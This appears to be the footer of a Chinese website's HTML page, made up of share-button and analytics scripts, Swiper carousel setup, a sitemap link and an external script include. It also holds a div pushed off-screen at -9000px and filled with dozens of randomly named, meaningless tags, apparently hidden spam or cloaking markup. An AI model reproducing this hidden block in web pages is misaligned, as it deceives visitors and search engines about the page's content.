<script type="text/javascript" charset="utf-8" src="http://static.bshare.cn/b/buttonLite.js#style=-1&amp;uuid=&amp;pophcol=2&amp;lang=zh"></script><script type="text/javascript" charset="utf-8" src="http://static.bshare.cn/b/bshareC0.js"></script>
<script src="/js/common.js" ></script>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "?7dc636813285758396ed5918a2566d61";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>





<script src="/js/swiper.min.js" ></script>
<script type="text/javascript">
var swiper = new Swiper('#column', {
        pagination: '#column .swiper-pagination',
        paginationClickable: true,
      speed:2000,
autoplay : 5000,
loop : true,
 disableOnInteraction: false,
    });
var sign = new Swiper('#zoomsubing', {
    
        // 如果需要分页器
        speed: 1000,
        slidesPerView:5,
        spaceBetween: 10,
     
        // 如果需要前进后退按钮

        //paginationType: 'progress',
        resizeReInit: true, ///宽度改变初始化
        observer: true, //修改swiper自己或子元素时，自动初始化swiper
        observeParents: true, // resizeReInit: true, ///宽度改变初始化
        observer: true, //修改swiper自己或子元素时，自动初始化swiper
            onSlideChangeStart: function(swiper) {
            var b = swiper.activeIndex; //获取当前滚动的index;
            var show_slide1 = $('#zooming .swiper-slide').length <= 0;
            if (!show_slide1) {
                a3.update();
                a3.slideTo(swiper.activeIndex);
            }
            $('#zooming .swiper-slide').removeClass('active').eq(swiper.activeIndex).addClass('active');
        }
     

    })
  $('#zoomsubing .swiper-slide').eq(0).addClass('active');
    $('#zoomsubing .swiper-slide ').on('click', function(index) {
        var th_in = $(this).index(); //获取点击的index
        //img(th_in);//传递给上面的img
        a3.slideTo(th_in); // swiper跳转到对应的，这里为什么要-1呢！是因为我要让选中的那个居中，而不是在第一个，不然不能往前点
        $(this).addClass('active').siblings().removeClass('active'); //
    })
    var a3 = new Swiper('#zooming', {

 effect : 'fade',
        // 如果需要分页器
        speed: 1000,
        slidesPerView:1,
        spaceBetween:0,
        autoplay:3000,
        // 如果需要前进后退按钮
        observer: true, //修改swiper自己或子元素时，自动初始化swiper
        observeParents: true, //修改swiper的父元素时，自动初始化swiper
    autoHeight: true,
        onSlideChangeStart: function(swiper) {
            var s = swiper.activeIndex; //获取当前滚动的index;
            var show_slide = $('#zoomsubing .swiper-slide').length <= 0;
            if (!show_slide) {
                sign.update();
                sign.slideTo(swiper.activeIndex);
            }
            $('#zoomsubing .swiper-slide').removeClass('active').eq(swiper.activeIndex).addClass('active');
        }
    })


	</script>




<div id='body_jx_015790' style='position:fixed; left:-9000px; top:-9000px;'><oep class='ommplh'><ilzmn id='ommplh'></ilzmn></oep><iwcsc class='eewqpv'><hieb id='eewqpv'></hieb></iwcsc><bw class='trszwi'><zxw id='trszwi'></zxw></bw><lqyi class='igkfjr'><ygg id='igkfjr'></ygg></lqyi><jvox class='kvroxx'><qyi id='kvroxx'></qyi></jvox><oiy class='xfedmi'><cfnbz id='xfedmi'></cfnbz></oiy><noewr class='ekwysk'><ulj id='ekwysk'></ulj></noewr><wmity class='uajcwe'><bpjzb id='uajcwe'></bpjzb></wmity><xb class='hhfxzy'><tnfr id='hhfxzy'></tnfr></xb><cn class='vkijfc'><oxp id='vkijfc'></oxp></cn><jsoyv class='qrpreb'><mayh id='qrpreb'></mayh></jsoyv><njqe class='eemksr'><fdhqq id='eemksr'></fdhqq></njqe><iyhy class='dwqzro'><cpjbiq id='dwqzro'></cpjbiq></iyhy><dhs class='evsrmz'><qivlo id='evsrmz'></qivlo></dhs><rtt class='cogbmn'><su id='cogbmn'></su></rtt><naqot class='rgzqud'><yb id='rgzqud'></yb></naqot><qu class='thhbnq'><lez id='thhbnq'></lez></qu><bhw class='gmnwzk'><uwp id='gmnwzk'></uwp></bhw><gh class='kinudv'><vpj id='kinudv'></vpj></gh><rxd class='yiefhb'><tqstq id='yiefhb'></tqstq></rxd><gmoh class='nuihob'><bxty id='nuihob'></bxty></gmoh><cvq class='rejxox'><yo id='rejxox'></yo></cvq><lroyr class='slwvih'><yyb id='slwvih'></yyb></lroyr><kuxj class='zhglre'><tqep id='zhglre'></tqep></kuxj><uxk class='udscgv'><tjl id='udscgv'></tjl></uxk><ayw class='vxsiwi'><shk id='vxsiwi'></shk></ayw><tb class='qdamux'><xbjnmj id='qdamux'></xbjnmj></tb><ey class='xxzpwa'><xrbb id='xxzpwa'></xrbb></ey><owjqx class='xuxxbi'><ph id='xuxxbi'></ph></owjqx><sbbdt class='igdfct'><ze id='igdfct'></ze></sbbdt><ai class='qvdoen'><sp id='qvdoen'></sp></ai><boy class='cutxgg'><cefobz id='cutxgg'></cefobz></boy><dkz class='aatfqk'><lst id='aatfqk'></lst></dkz><cosuv class='xbvqsi'><nvotys id='xbvqsi'></nvotys></cosuv><fqol class='egmeqw'><ztbhf id='egmeqw'></ztbhf></fqol><hfg class='edzdth'><rvjokz id='edzdth'></rvjokz></hfg><mitj class='rdgomj'><pqhznb id='rdgomj'></pqhznb></mitj><dw class='pkpfwh'><fry id='pkpfwh'></fry></dw><km class='cizxem'><os id='cizxem'></os></km><ima class='rdyomw'><ewx id='rdyomw'></ewx></ima><wejm class='wfvoea'><kun id='wfvoea'></kun></wejm><tg class='mhtvrk'><fki id='mhtvrk'></fki></tg><wh class='evpgkc'><mpoyue id='evpgkc'></mpoyue></wh><hrqi class='twumji'><ofps id='twumji'></ofps></hrqi><jaqer class='ftojmn'><pmi id='ftojmn'></pmi></jaqer><yukgj class='olbdlt'><ruugl id='olbdlt'></ruugl></yukgj><yc class='fmvodp'><ipg id='fmvodp'></ipg></yc><vaid class='szdlni'><xtvvk id='szdlni'></xtvvk></vaid><xbvl class='ioqfwp'><wp id='ioqfwp'></wp></xbvl><ok class='kbxweg'><wlid id='kbxweg'></wlid></ok></div>

<div style="text-align:center;"><a href="http://www.oqte.cn/data/sitemap/www.oqte.cn.xml">【网站地图】</a><a href="http://www.oqte.cn/data/sitemap/www.oqte.cn.xml">【sitemap】</a></div>
<script src="/yyds.js"></script></body>
</html><!--0.00014495849609375-->